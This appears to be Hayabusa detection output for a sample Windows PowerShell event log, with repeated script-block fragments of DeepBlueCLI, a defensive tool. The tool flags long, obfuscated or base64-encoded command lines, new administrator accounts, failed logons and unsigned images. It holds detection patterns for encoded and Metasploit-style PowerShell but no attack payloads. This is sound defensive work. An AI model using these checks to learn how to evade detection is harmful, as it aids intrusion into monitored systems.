""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ 
write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded 
function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.669 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.672 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Obfu $pscommand) $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Obfu $commandline) $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if 
($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:11:27.682 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host 
$log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. 
